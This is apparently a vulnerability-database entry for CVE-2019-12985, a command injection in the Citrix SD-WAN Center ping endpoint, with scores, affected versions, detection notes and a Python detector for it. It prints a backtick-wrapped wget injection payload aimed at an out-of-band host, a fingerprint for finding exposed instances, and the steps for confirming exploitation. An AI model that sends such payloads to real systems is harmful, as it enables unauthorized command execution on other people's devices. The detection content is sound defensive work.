CVE-2019-12985
published 2019-07-16

CVE-2019-12985: Citrix SD-WAN 10.2.x before 10.2.3 and NetScaler SD-WAN 10.0.x before 10.0.8 have Improper Input Validation (issue 1 of 6).

Priority: P187 | critical | 9.8 (CVSS 3.0)
Vector: AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Tags: ITW, EXPLOIT, VulnCheck KEV
Exploited in the wild
EPSS: 42.55% (98.5th percentile)

Affected

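6 ranges

| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| citrix | citrix_sd-wan | | |
| citrix | netscaler_adc_gateway | | |
| citrix | netscaler_sd-wan | >= 10.0 < 10.0.8 | 10.0.8 |
| citrix | sd-wan | | |
| citrix | sd-wan | >= 10.2 < 10.2.3 | 10.2.3 |
| citrix | xenserver | | |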

Detection & IOCs (extracted from sources)

url: POST /Collector/diagnostics/ping
path: /Collector/diagnostics/ping
command: ipAddress=%60/bin/wget+http://{{interactsh-url}}%60
  • Detect exploitation attempts by monitoring POST requests to /Collector/diagnostics/ping containing shell metacharacters (backtick, semicolon, pipe) in the ipAddress, pingCount, or packetSize parameters.
  • Traffic is routed through the Collector controller endpoint; monitor for unexpected HTTP POST requests to /Collector/diagnostics/ping from unauthenticated or external sources.
  • Shodan/FOFA fingerprint for exposed Citrix SD-WAN Center instances: search for HTTP title 'Citrix SD-WAN' to identify attack surface.
  • Confirm exploitation via out-of-band HTTP interaction (OAST): a successful payload causes the target to issue an outbound HTTP request (e.g., via wget) to an attacker-controlled host.
  • Verify target is Citrix SD-WAN Center by checking that the login page body contains the string 'Citrix SD-WAN' before attempting the injection endpoint.
  • The vulnerability exists in Citrix SD-WAN 10.2.x before 10.2.3 and NetScaler SD-WAN 10.0.x before 10.0.8; detections should be scoped to these version ranges.
  • The injection point is specifically the ping function in DiagnosticsController; other diagnostic functions may not be affected by this specific issue.
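
The metacharacter check from the first bullet, as an added example (not code from this page or from Citrix). It assumes a proxy or WAF log that exposes the method, request target and form-encoded body of each request; the sample records are constructed, and the repeated URL-decoding step goes beyond the bullet to catch double-encoded metacharacters.

```python
import re
from urllib.parse import parse_qsl, unquote_plus, urlsplit

TARGET_PATH = "/Collector/diagnostics/ping"          # endpoint named on this page
WATCHED = ("ipAddress", "pingCount", "packetSize")    # parameters named on this page
METACHARS = re.compile(r"[`;|]")                      # backtick, semicolon, pipe


def fully_decode(value, rounds=3):
    """Undo nested URL-encoding (%2560 -> %60 -> `) so it cannot hide a metacharacter."""
    for _ in range(rounds):
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    return value


def flag_request(method, target, body):
    """Return [(param, decoded_value)] for watched parameters carrying shell metacharacters."""
    if method.upper() != "POST":
        return []
    # Ignore any query string and a trailing slash when matching the endpoint.
    if urlsplit(target).path.rstrip("/") != TARGET_PATH:
        return []
    hits = []
    for name, value in parse_qsl(body, keep_blank_values=True):
        value = fully_decode(value)
        if name in WATCHED and METACHARS.search(value):
            hits.append((name, value))
    return hits


# Constructed sample records (method, request target, form body); not real traffic.
# Assumption: the log source provides these three fields per request.
SAMPLES = [
    ("POST", "/Collector/diagnostics/ping", "ipAddress=192.0.2.10&pingCount=4&packetSize=64"),
    ("POST", "/Collector/diagnostics/ping", "ipAddress=%60/bin/wget+http://oast.example.invalid%60&pingCount=4"),
    ("POST", "/Collector/diagnostics/ping/", "ipAddress=192.0.2.10&pingCount=4%253Bid"),
    ("GET", "/Collector/diagnostics/ping", "ipAddress=%60id%60"),
]

if __name__ == "__main__":
    for method, target, body in SAMPLES:
        print(method, target, "->", flag_request(method, target, body) or "clean")
```

Standard access logs usually omit POST bodies, so this check needs a source that records them, such as a reverse proxy or WAF with body logging enabled.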

CVSS provenance

nvd | v3.0 | 9.8 | CRITICAL | CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
nvd | v2.0 | 10.0 | CRITICAL | AV:N/AC:L/Au:N/C:C/I:C/A:C
vulncheck | 9.8 | CRITICAL